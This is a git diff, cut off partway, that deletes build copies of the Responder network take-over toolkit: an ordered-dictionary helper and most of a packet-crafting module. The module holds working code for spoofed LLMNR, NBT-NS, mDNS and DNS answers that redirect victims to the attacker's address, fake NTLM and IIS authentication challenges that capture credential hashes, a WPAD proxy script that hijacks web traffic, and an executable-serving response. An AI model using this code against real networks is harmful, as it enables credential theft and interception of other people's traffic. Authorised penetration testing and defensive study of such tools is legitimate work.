- - - diff --git a/build/lib/Responder/logs/.gitignore b/build/lib/Responder/logs/.gitignore deleted file mode 100644 index e69de29..0000000 diff --git a/build/lib/Responder/odict.py b/build/lib/Responder/odict.py deleted file mode 100644 index 666e3b1..0000000 --- a/build/lib/Responder/odict.py +++ /dev/null @@ -1,124 +0,0 @@ -import sys -try: - from UserDict import DictMixin -except ImportError: - from collections import UserDict - try: - from collections import MutableMapping as DictMixin - except ImportError: - from collections.abc import MutableMapping as DictMixin - -class OrderedDict(dict, DictMixin): - - def __init__(self, *args, **kwds): - if len(args) > 1: - raise TypeError('expected at most 1 arguments, got %d' % len(args)) - try: - self.__end - except AttributeError: - self.clear() - self.update(*args, **kwds) - - def clear(self): - self.__end = end = [] - end += [None, end, end] - self.__map = {} - dict.clear(self) - - def __setitem__(self, key, value): - if key not in self: - end = self.__end - curr = end[1] - curr[2] = end[1] = self.__map[key] = [key, curr, end] - dict.__setitem__(self, key, value) - - def __delitem__(self, key): - dict.__delitem__(self, key) - key, prev, next = self.__map.pop(key) - prev[2] = next - next[1] = prev - - def __iter__(self): - end = self.__end - curr = end[2] - while curr is not end: - yield curr[0] - curr = curr[2] - - def __reversed__(self): - end = self.__end - curr = end[1] - while curr is not end: - yield curr[0] - curr = curr[1] - - def popitem(self, last=True): - if not self: - raise KeyError('dictionary is empty') - if last: - key = reversed(self).next() - else: - key = iter(self).next() - value = self.pop(key) - return key, value - - def __reduce__(self): - items = [[k, self[k]] for k in self] - tmp = self.__map, self.__end - del self.__map, self.__end - inst_dict = vars(self).copy() - self.__map, self.__end = tmp - if inst_dict: - return (self.__class__, (items,), inst_dict) - return self.__class__, (items,) - - def keys(self): - return list(self) - - if sys.version_info >= (3, 0): - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.keys - itervalues = DictMixin.values - iteritems = DictMixin.items - else: - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.iterkeys - itervalues = DictMixin.itervalues - iteritems = DictMixin.iteritems - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, self.items()) - - def copy(self): - return self.__class__(self) - - @classmethod - def fromkeys(cls, iterable, value=None): - d = cls() - for key in iterable: - d[key] = value - return d - - def __eq__(self, other): - if isinstance(other, OrderedDict): - return len(self)==len(other) and \ - min(p==q for p, q in zip(self.items(), other.items())) - return dict.__eq__(self, other) - - def __ne__(self, other): - return not self == other - - -if __name__ == '__main__': - d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)]) - assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh'] diff --git a/build/lib/Responder/packets.py b/build/lib/Responder/packets.py deleted file mode 100644 index 530338d..0000000 --- a/build/lib/Responder/packets.py +++ /dev/null @@ -1,2493 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . - -import struct -import Responder.settings as settings -import codecs -import random -import re -from os import urandom -from base64 import b64decode, b64encode -from Responder.odict import OrderedDict -from Responder.utils import HTTPCurrentDate, SMBTime, RespondWithIPAton, RespondWithIPPton, RespondWithIP, StructPython2or3, NetworkRecvBufferPython2or3, StructWithLenPython2or3 - -# Packet class handling all packet generation (see odict.py). -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - -# NBT Answer Packet -class NBT_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x00"), - ("Question", "\x00\x00"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("NbtName", ""), - ("Type", "\x00\x20"), - ("Classy", "\x00\x01"), - ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior) - ("Len", "\x00\x06"), - ("Flags1", "\x00\x00"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = NetworkRecvBufferPython2or3(data[0:2]) - self.fields["NbtName"] = NetworkRecvBufferPython2or3(data[12:46]) - self.fields["IP"] = RespondWithIPAton() - -# DNS Answer Packet -class DNS_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x10"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x01"), - ("Class", "\x00\x01"), - ("AnswerPointer", "\xc0\x0c"), - ("Type1", "\x00\x01"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = data[0:2] - self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -# DNS Answer Packet OPT -class DNS_AnsOPT(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x10"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x01"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x01"), - ("Class", "\x00\x01"), - ("AnswerPointer", "\xc0\x0c"), - ("Type1", "\x00\x01"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ("OPTName", "\x00"), - ("OPTType", "\x00\x29"), - ("OPTUDPSize", "\x10\x00"), - ("OPTRCode", "\x00"), - ("OPTEDNSVersion", "\x00"), - ("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case. - ("OPTStr", "\x00\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = data[0:2] - self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -class DNS6_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x10"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x1c"), - ("Class", "\x00\x01"), - ("AnswerPointer", "\xc0\x0c"), - ("Type1", "\x00\x1c"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = data[0:2] - self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = RespondWithIPPton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -class DNS6_AnsOPT(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x10"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x01"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x1c"), - ("Class", "\x00\x01"), - ("AnswerPointer", "\xc0\x0c"), - ("Type1", "\x00\x1c"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ("OPTName", "\x00"), - ("OPTType", "\x00\x29"), - ("OPTUDPSize", "\x10\x00"), - ("OPTRCode", "\x00"), - ("OPTEDNSVersion", "\x00"), - ("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case. - ("OPTStr", "\x00\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = data[0:2] - self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = RespondWithIPPton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -class DNS_SRV_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x85\x80"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x21"),#srv - ("Class", "\x00\x01"), - ("AnswerPointer", "\xc0\x0c"), - ("Type1", "\x00\x21"),#srv - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. - ("RecordLen", ""), - ("Priority", "\x00\x00"), - ("Weight", "\x00\x64"), - ("Port", "\x00\x00"), - ("TargetLenPre", "\x0f"), # static, we provide netbios computer name 15 chars like Windows by default. - ("TargetPrefix", ""), - ("TargetLenSuff", ""), - ("TargetSuffix", ""), - ("TargetLenSuff2", ""), - ("TargetSuffix2", ""), - ("TargetNull", "\x00"), - ]) - - def calculate(self,data): - self.fields["Tid"] = data[0:2] - DNSName = ''.join(data[12:].split('\x00')[:1]) - SplitFQDN = re.split(r'\W+', DNSName) # split the ldap.tcp.blah.blah.blah.domain.tld - - #What's the question? we need it first to calc all other len. - self.fields["QuestionName"] = DNSName - - #Want to be detected that easily by xyz sensor? - self.fields["TargetPrefix"] = settings.Config.MachineName - - #two last parts of the domain are the actual Domain name.. eg: contoso.com - self.fields["TargetSuffix"] = SplitFQDN[-2] - self.fields["TargetSuffix2"] = SplitFQDN[-1] - #We calculate the len for that domain... - self.fields["TargetLenSuff2"] = StructPython2or3(">B",self.fields["TargetSuffix2"]) - self.fields["TargetLenSuff"] = StructPython2or3(">B",self.fields["TargetSuffix"]) - - # Calculate Record len. - CalcLen = self.fields["Priority"]+self.fields["Weight"]+self.fields["Port"]+self.fields["TargetLenPre"]+self.fields["TargetPrefix"]+self.fields["TargetLenSuff"]+self.fields["TargetSuffix"]+self.fields["TargetLenSuff2"]+self.fields["TargetSuffix2"]+self.fields["TargetNull"] - - #Our answer len.. - self.fields["RecordLen"] = StructPython2or3(">h",CalcLen) - - #for now we support ldap and kerberos... - if "ldap" in DNSName: - self.fields["Port"] = StructWithLenPython2or3(">h", 389) - - if "kerberos" in DNSName: - self.fields["Port"] = StructWithLenPython2or3(">h", 88) - - -# LLMNR Answer Packet -class LLMNR_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x80\x00"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("QuestionNameLen", "\x09"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x01"), - ("Class", "\x00\x01"), - ("AnswerNameLen", "\x09"), - ("AnswerName", ""), - ("AnswerNameNull", "\x00"), - ("Type1", "\x00\x01"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior) - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self): - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"]) - self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"]) - -class LLMNR6_Ans(Packet): - fields = OrderedDict([ - ("Tid", ""), - ("Flags", "\x80\x00"), - ("Question", "\x00\x01"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("QuestionNameLen", "\x09"), - ("QuestionName", ""), - ("QuestionNameNull", "\x00"), - ("Type", "\x00\x1c"), - ("Class", "\x00\x01"), - ("AnswerNameLen", "\x09"), - ("AnswerName", ""), - ("AnswerNameNull", "\x00"), - ("Type1", "\x00\x1c"), - ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior). - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self): - self.fields["IP"] = RespondWithIPPton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"]) - self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"]) - -# MDNS Answer Packet -class MDNS_Ans(Packet): - fields = OrderedDict([ - ("Tid", "\x00\x00"), - ("Flags", "\x84\x00"), - ("Question", "\x00\x00"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("AnswerName", ""), - ("AnswerNameNull", "\x00"), - ("Type", "\x00\x01"), - ("Class", "\x00\x01"), - ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self): - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -# MDNS6 Answer Packet -class MDNS6_Ans(Packet): - fields = OrderedDict([ - ("Tid", "\x00\x00"), - ("Flags", "\x84\x00"), - ("Question", "\x00\x00"), - ("AnswerRRS", "\x00\x01"), - ("AuthorityRRS", "\x00\x00"), - ("AdditionalRRS", "\x00\x00"), - ("AnswerName", ""), - ("AnswerNameNull", "\x00"), - ("Type", "\x00\x1c"), - ("Class", "\x00\x01"), - ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) - ("IPLen", "\x00\x04"), - ("IP", "\x00\x00\x00\x00"), - ]) - - def calculate(self): - self.fields["IP"] = RespondWithIPPton() - self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) - -################### DHCP SRV ###################### - - -##### HTTP Packets ##### -class NTLM_Challenge(Packet): - fields = OrderedDict([ - ("Signature", "NTLMSSP"), - ("SignatureNull", "\x00"), - ("MessageType", "\x02\x00\x00\x00"), - ("TargetNameLen", "\x06\x00"), - ("TargetNameMaxLen", "\x06\x00"), - ("TargetNameOffset", "\x38\x00\x00\x00"), - ("NegoFlags", "\x05\x02\x81\xa2" if settings.Config.NOESS_On_Off else "\x05\x02\x89\xa2"), - ("ServerChallenge", ""), - ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("TargetInfoLen", "\x7e\x00"), - ("TargetInfoMaxLen", "\x7e\x00"), - ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), - ("TargetNameStr", settings.Config.Domain), - ("Av1", "\x02\x00"),#nbt name - ("Av1Len", "\x06\x00"), - ("Av1Str", settings.Config.Domain), - ("Av2", "\x01\x00"),#Server name - ("Av2Len", "\x14\x00"), - ("Av2Str", settings.Config.MachineName), - ("Av3", "\x04\x00"),#Full Domain name - ("Av3Len", "\x12\x00"), - ("Av3Str", settings.Config.DomainName), - ("Av4", "\x03\x00"),#Full machine domain name - ("Av4Len", "\x28\x00"), - ("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName), - ("Av5", "\x05\x00"),#Domain Forest Name - ("Av5Len", "\x12\x00"), - ("Av5Str", settings.Config.DomainName), - ("Av6", "\x00\x00"),#AvPairs Terminator - ("Av6Len", "\x00\x00"), - ]) - - def calculate(self): - # First convert to unicode - self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') - self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') - self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') - self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') - self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') - self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') - #Now from bytes to str.. - self.fields["TargetNameStr"] = self.fields["TargetNameStr"].decode('latin-1') - self.fields["Av1Str"] = self.fields["Av1Str"].decode('latin-1') - self.fields["Av2Str"] = self.fields["Av2Str"].decode('latin-1') - self.fields["Av3Str"] = self.fields["Av3Str"].decode('latin-1') - self.fields["Av4Str"] = self.fields["Av4Str"].decode('latin-1') - self.fields["Av5Str"] = self.fields["Av5Str"].decode('latin-1') - # Then calculate - - CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str("A"*8)+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) - - CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) - CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) - - # Target Name Offsets - self.fields["TargetNameOffset"] = StructPython2or3(" - - - -401 - Unauthorized: Access is denied due to invalid credentials. - - - - -
-
-

401 - Unauthorized: Access is denied due to invalid credentials.

-

You do not have permission to view this directory or page using the credentials that you supplied.

-
-
- - -"""), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -class IIS_Auth_Granted(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload", ""), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -class IIS_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "WWW-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload2", """ -Not Authorized - -

Not Authorized

-

HTTP Error 401. The requested resource requires user authentication.

- -"""), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload2"])) - -class WinRM_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401\r\n"), - ("WWWAuth", "WWW-Authenticate: Negotiate "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("ServerType", "Server: Microsoft-HTTPAPI/2.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) - -class IIS_Basic_401_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Len", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload", """ - - - -401 - Unauthorized: Access is denied due to invalid credentials. - - - - -
-
-

401 - Unauthorized: Access is denied due to invalid credentials.

-

You do not have permission to view this directory or page using the credentials that you supplied.

-
-
- - -"""), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -##### Proxy mode Packets ##### -class WPADScript(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"), - ("Cache", "Pragma: no-cache\r\n"), - ("Server", "Server: BigIP\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload", "function FindProxyForURL(url, host){return 'PROXY "+RespondWithIP()+":3141; DIRECT';}"), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -class ServeExeFile(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("ContentType", "Content-Type: application/octet-stream\r\n"), - ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), - ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/10.0\r\n"), - ("ContentDisp", "Content-Disposition: attachment; filename="), - ("ContentDiFile", ""), - ("FileCRLF", ";\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"), - ("Connection", "Connection: keep-alive\r\n"), - ("X-CCC", "US\r\n"), - ("X-CID", "2\r\n"), - ("CRLF", "\r\n"), - ("Payload", "jj"), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -class ServeHtmlFile(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("ContentType", "Content-Type: text/html\r\n"), - ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), - ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/10.0\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"), - ("Connection", "Connection: keep-alive\r\n"), - ("CRLF", "\r\n"), - ("Payload", "jj"), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -##### WPAD Auth Packets ##### -class WPAD_Auth_407_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), - ("Connection", "Proxy-Connection: close\r\n"), - ("Cache-Control", "Cache-Control: no-cache\r\n"), - ("Pragma", "Pragma: no-cache\r\n"), - ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - -class WPAD_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "Proxy-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) - -class WPAD_Basic_407_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("Connection", "Proxy-Connection: close\r\n"), - ("Cache-Control", "Cache-Control: no-cache\r\n"), - ("Pragma", "Pragma: no-cache\r\n"), - ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - -##### WEB Dav Stuff ##### -class WEBDAV_Options_Answer(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), - ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), - ("Connection", "Connection: Keep-Alive\r\n"), - ("Content-Type", "Content-Type: text/html\r\n"), - ("CRLF", "\r\n"), - ]) - -##### FTP Packets ##### -class FTPPacket(Packet): - fields = OrderedDict([ - ("Code", "220"), - ("Separator", "\x20"), - ("Message", "Welcome"), - ("Terminator", "\x0d\x0a"), - ]) - -##### SQL Packets ##### -class MSSQLPreLoginAnswer(Packet): - fields = OrderedDict([ - ("PacketType", "\x04"), - ("Status", "\x01"), - ("Len", "\x00\x25"), - ("SPID", "\x00\x00"), - ("PacketID", "\x01"), - ("Window", "\x00"), - ("TokenType", "\x00"), - ("VersionOffset", "\x00\x15"), - ("VersionLen", "\x00\x06"), - ("TokenType1", "\x01"), - ("EncryptionOffset", "\x00\x1b"), - ("EncryptionLen", "\x00\x01"), - ("TokenType2", "\x02"), - ("InstOptOffset", "\x00\x1c"), - ("InstOptLen", "\x00\x01"), - ("TokenTypeThrdID", "\x03"), - ("ThrdIDOffset", "\x00\x1d"), - ("ThrdIDLen", "\x00\x00"), - ("ThrdIDTerminator", "\xff"), - ("VersionStr", "\x09\x00\x0f\xc3"), - ("SubBuild", "\x00\x00"), - ("EncryptionStr", "\x02"), - ("InstOptStr", "\x00"), - ]) - - def calculate(self): - CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"]) - VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"]) - EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"]) - InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"]) - ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"]) - - self.fields["Len"] = StructWithLenPython2or3(">h",len(CalculateCompletePacket)) - #Version - self.fields["VersionLen"] = StructWithLenPython2or3(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"])) - self.fields["VersionOffset"] = StructWithLenPython2or3(">h",len(VersionOffset)) - #Encryption - self.fields["EncryptionLen"] = StructWithLenPython2or3(">h",len(self.fields["EncryptionStr"])) - self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(EncryptionOffset)) - #InstOpt - self.fields["InstOptLen"] = StructWithLenPython2or3(">h",len(self.fields["InstOptStr"])) - self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(InstOpOffset)) - #ThrdIDOffset - self.fields["ThrdIDOffset"] = StructWithLenPython2or3(">h",len(ThrdIDOffset)) - -class MSSQLNTLMChallengeAnswer(Packet): - fields = OrderedDict([ - ("PacketType", "\x04"), - ("Status", "\x01"), - ("Len", "\x00\xc7"), - ("SPID", "\x00\x00"), - ("PacketID", "\x01"), - ("Window", "\x00"), - ("TokenType", "\xed"), - ("SSPIBuffLen", "\xbc\x00"), - ("Signature", "NTLMSSP"), - ("SignatureNull", "\x00"), - ("MessageType", "\x02\x00\x00\x00"), - ("TargetNameLen", "\x06\x00"), - 